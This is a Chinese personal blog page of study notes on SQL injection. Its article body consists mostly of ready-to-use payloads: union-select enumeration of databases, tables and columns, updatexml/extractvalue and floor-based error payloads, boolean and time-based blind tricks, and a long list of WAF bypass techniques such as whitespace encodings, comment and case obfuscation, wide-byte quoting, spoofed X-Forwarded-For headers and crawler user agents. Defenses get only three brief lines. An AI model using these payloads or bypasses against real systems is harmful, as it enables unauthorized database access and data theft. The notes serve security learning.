



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="学无止境" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="学无止境" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="学无止境" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Top10" />


<link rel="canonical" href="http://example.com/2023/04/09/Internet%20Security/hello-world/">



  <title>
SQL注入 - 网安 |
BLANK = 学无止境 = 与众不同，就一定会痛苦</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">SQL注入
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-04-09 11:33:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-04-09T11:33:00+08:00">2023-04-09</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>1.1k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>4 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">BLANK</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?201611"></li>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?767817"></li>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?326730"></li>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?630914"></li>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?276967"></li>
          <li class="item" data-background-image="https://acg.xydwz.cn/api/api.php?219735"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E7%BD%91%E5%AE%89/" itemprop="item" rel="index" title="分类于 网安"><span itemprop="name">网安</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2023/04/09/Internet%20Security/hello-world/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="Blank">
    <meta itemprop="description" content="与众不同，就一定会痛苦, 繁星不怕被看作流萤">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="学无止境">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="本周重点"><a href="#本周重点" class="headerlink" title="本周重点"></a>本周重点</h1><h3 id="1-产生原理（实质）"><a href="#1-产生原理（实质）" class="headerlink" title="1.产生原理（实质）"></a>1.产生原理（实质）</h3><p>1.用户能调控参数（像id=2 union select 1,2,3–+)要能添加代码<br>2.原本数据库只执行（id=2)语句，但执行了用户拼接的一些代码</p>
<h3 id="2-类型"><a href="#2-类型" class="headerlink" title="2.类型"></a>2.类型</h3><p>1.联合注入<br>        2.堆叠注入<br>        3.宽字节注入<br>        4.cookie注入<br>        5.XFF头注入<br>        6.UA注入（user-agent注入）<br>        7.Referer注入<br>        8.二次注入<br>        9.base64注入<br>        11.万能密码<br>        12.文件读写<br>盲注类型：<br>        1.基于时间的盲注     sleep()   benchmark()<br>        2.基于布尔的注入<br>        3.基于报错的注入     updatexml()  extractvalue()  floor()  exp()</p>
<h3 id="语言"><a href="#语言" class="headerlink" title="语言"></a>语言</h3><pre><code class="SQL">一，union select
?id=-2 &#39;   &quot;   )     &#39;)    &quot;)      ]     )]
order by 3 --+
union select 1,2,3 --+
union select 1,database(),3 --+
union select 1,select group_concat(table_name) from information_schema.tables where table_schema=database(),3 --+
union select 1,select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name =&quot;&quot;,3--+
union select 1,select group_concat(id)from users,3 --+
二，报错注入
1.and extractvalue(1,concat(0x7e,(database()),0x7e)) --+
2.and updatexml(1,(concat(0x3a,(database()),0x3a)),1) --+
0x7e----&gt;~
0x3a----&gt;:
三,爆出
index.php?id=2&#39; and (select 1 from (select count(*),concat(0x3a,0x3a,(database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
</code></pre>
<h3 id="3-如何防范"><a href="#3-如何防范" class="headerlink" title="3.如何防范"></a>3.如何防范</h3><h4 id="存在哪些风险、对应的对策是什么。"><a href="#存在哪些风险、对应的对策是什么。" class="headerlink" title="存在哪些风险、对应的对策是什么。"></a>存在哪些风险、对应的对策是什么。</h4><blockquote>
<p>1.预编译  （数据库不会将参数的内容视为SQL命令执行，而是作为一个字段的属性值来处理）</p>
<blockquote>
<p>2.PDO预处理                 (本地和Mysql服务端使用字符集对输入进行转义)</p>
<blockquote>
<p>3.正则表达式过滤          (如果用户输入了非法信息则利用正则表达式过滤)<br> 4那如何反防范呢？<br>接下来将展示一些绕过的姿势。<br>1.屏蔽or and 空格 注释符<br>or 用|| 或  |<br>and 用&amp;&amp; 或&amp;</p>
</blockquote>
</blockquote>
</blockquote>
<h3 id="4那如何反防范呢？"><a href="#4那如何反防范呢？" class="headerlink" title="4那如何反防范呢？"></a>4那如何反防范呢？</h3><h4 id="接下来将展示一些绕过的姿势。"><a href="#接下来将展示一些绕过的姿势。" class="headerlink" title="接下来将展示一些绕过的姿势。"></a>接下来将展示一些绕过的姿势。</h4><blockquote>
<p>替代空格的东西<br>%09 水平tab键<br>%0a 新建一行<br>%0c 新建一页<br>%0d 回车键<br>%0b 垂直tab键<br>%a0 也是空格键</p>
</blockquote>
<blockquote>
<p>屏蔽–+号<br>用 or ‘1’ =’1 代替<br>如<br>?id=2000000’%0aunion%0aselect%0a1,2,3%0a||%0a’1’=’1<br>如果哪天%的空格都不能用，不用空格<br>无空格写法用（）<br>?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database())),0x7e),1))||’1’=’1</p>
</blockquote>
<hr>
<pre><code class="SQL">小知识:
对&#39; \ 屏蔽，前面多加个\
数据库用的是gbk编码，会把2个字符当作一个汉字
如：
?id=1%df\&#39;（在机器看来这就是个1+字符+&#39;)
post类
burp抓包
在目标位置admin%df%27 union select 1,2 #

常见绕过：
1.大小写绕过
Union SelEct
2.双写绕过
ununionion
3.编码绕过
security--&gt;hex编码
urlencode
4.注释符/**/
uni/**/on sel/**/ect
5.对于空格绕过
开头已提过了
6.对于or and绕过
and = &amp;&amp;
or = ||
7.单引号
%df%27
8.反引号
反引号只能在表名，一般情况下如果表名和语法一样，那么就必须用反引号修饰，否则数据库会误以为这是语法！！！！！！！！！！！！！！！！！！！！！！
select username,password from `table1` where id=&#39;1&#39; limit 0,1
where
select * from `where` where id =1
9.内联注释
and /*!select*/ 1,2
10.&lt;&gt;绕过
uni&lt;&gt;on sel&lt;&gt;ect
对了这里加一布尔型的盲注(猜库名
select * from users where id=1 and ascii(substr(database(),0,1)) &gt; 115
greatest least
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64


11.屏蔽逗号
select substr(&quot;xxxxx&quot;,1,3)
select substr(&quot;xxxxx&quot; from 1 to 3)

union select 1,2,3
union select * from (select 1)a join (select 2)b join (select 3)c;

limit 0,1
limit 0 offset 1
12.sleep屏蔽
and sleep(1)
and benchmark(100000000（0的个数视情况而定）,1);
13.group_concat屏蔽
select group_concat(&quot;haha&quot;,&quot;niao&quot;);
select concat_ws(&quot; &quot;,&quot;haha&quot;,&quot;niao&quot;);
（把&quot;&quot;放到&quot;haha&quot;,&quot;niao&quot;中间并合并输出）
14.等号屏蔽
用 like rlike regexp &lt;&gt;(不等号)?id=1&#39; or 1 like 1
?id=1&#39; or 1 &lt;&gt; 1
15.post情况屏蔽#
id=3&quot;) or 1=1 -- a 使用--空格a可以在post情况下替代#
16.ip地址拦截（只允许内网访问）
X-forwarded-for：ip地址
X-remote-IP：ip地址
X-Originating-IP：ip地址
X-remote-addr：ip地址
X-Real-Ip：ip地址
(一般放在抓包中间，DNT之后)
17.修改静态资源
http://www.xx.com/sql.php?id=1
可以替换为
http://www.xx.com/sql.php/1.js?id=1
18.url白名单
为了防止防火墙误伤，部分waf(防火墙)内置白名单列表 admin manager system...
如:
http://www.xx.com/sql.php/admin.php?id=1
http://www.xx.com/sql.php?xxxx=/manager/&amp;b=攻击代码

http://www.xx.com/../../../../manager/../sql.php?id=1
19.爬虫白名单(waf让baidu等搜索引擎蜘蛛能进入)
伪造自己是搜索引擎（修改user-agent）
将user-agent改为baidu等一些搜索引擎蜘蛛的user-agent
20.数据库注释执行
/*!50001 select * from table1*/;
如果数据库版本是5.00.01 版本以下的，语句才会执行
/*!45509 union select */ 1,2,3 --+
21.增加干扰
union all %23%a0 select 1,2,3 --+
</code></pre>
<h4 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h4><p>有什么想法或心得体会，都可以拿出来分享下。</p>

      <div class="tags">
          <a href="/tags/Top10/" rel="tag"><i class="ic i-tag"></i> Top10</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-04-10 16:18:57" itemprop="dateModified" datetime="2023-04-10T16:18:57+08:00">2023-04-10</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="Blank 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="Blank 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="Blank 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>Blank <i class="ic i-at"><em>@</em></i>学无止境
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/04/09/Internet%20Security/hello-world/" title="SQL注入">http://example.com/2023/04/09/Internet Security/hello-world/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
    </div>
    <div class="item right">
      

  <a href="/2023/04/10/Internet%20Security/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;acg.xydwz.cn&#x2F;api&#x2F;api.php?825739" title="信息搜集">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 网安</span>
  <h3>信息搜集</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AC%E5%91%A8%E9%87%8D%E7%82%B9"><span class="toc-number">1.</span> <span class="toc-text">本周重点</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E4%BA%A7%E7%94%9F%E5%8E%9F%E7%90%86%EF%BC%88%E5%AE%9E%E8%B4%A8%EF%BC%89"><span class="toc-number">1.0.1.</span> <span class="toc-text">1.产生原理（实质）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%B1%BB%E5%9E%8B"><span class="toc-number">1.0.2.</span> <span class="toc-text">2.类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%AD%E8%A8%80"><span class="toc-number">1.0.3.</span> <span class="toc-text">语言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%A6%82%E4%BD%95%E9%98%B2%E8%8C%83"><span class="toc-number">1.0.4.</span> <span class="toc-text">3.如何防范</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AD%98%E5%9C%A8%E5%93%AA%E4%BA%9B%E9%A3%8E%E9%99%A9%E3%80%81%E5%AF%B9%E5%BA%94%E7%9A%84%E5%AF%B9%E7%AD%96%E6%98%AF%E4%BB%80%E4%B9%88%E3%80%82"><span class="toc-number">1.0.4.1.</span> <span class="toc-text">存在哪些风险、对应的对策是什么。</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4%E9%82%A3%E5%A6%82%E4%BD%95%E5%8F%8D%E9%98%B2%E8%8C%83%E5%91%A2%EF%BC%9F"><span class="toc-number">1.0.5.</span> <span class="toc-text">4那如何反防范呢？</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A5%E4%B8%8B%E6%9D%A5%E5%B0%86%E5%B1%95%E7%A4%BA%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E7%9A%84%E5%A7%BF%E5%8A%BF%E3%80%82"><span class="toc-number">1.0.5.1.</span> <span class="toc-text">接下来将展示一些绕过的姿势。</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%9D%E8%80%83"><span class="toc-number">1.0.5.2.</span> <span class="toc-text">思考</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2023/04/09/Internet%20Security/hello-world/" rel="bookmark" title="SQL注入">SQL注入</a></li><li><a href="/2023/04/10/Internet%20Security/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" rel="bookmark" title="信息搜集">信息搜集</a></li><li><a href="/2023/04/11/Internet%20Security/OSINT/" rel="bookmark" title="OSINT">OSINT</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="Blank"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">Blank</p>
  <div class="description" itemprop="description">繁星不怕被看作流萤</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">3</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">1</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">2</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2JsYW5rbGVk" title="https:&#x2F;&#x2F;github.com&#x2F;blankled"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>friends</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/reader/" rel="section"><i class="ic i-heart"></i>reader</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%BD%91%E5%AE%89/" title="分类于 网安">网安</a>
</div>

    <span><a href="/2023/04/11/Internet%20Security/OSINT/" title="OSINT">OSINT</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%BD%91%E5%AE%89/" title="分类于 网安">网安</a>
</div>

    <span><a href="/2023/04/09/Internet%20Security/hello-world/" title="SQL注入">SQL注入</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%BD%91%E5%AE%89/" title="分类于 网安">网安</a>
</div>

    <span><a href="/2023/04/10/Internet%20Security/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" title="信息搜集">信息搜集</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-BLANK"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Blank @ BLANK</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">3k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">10 分钟</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/04/09/Internet Security/hello-world/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":210,"height":420},"mobile":{"show":true},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
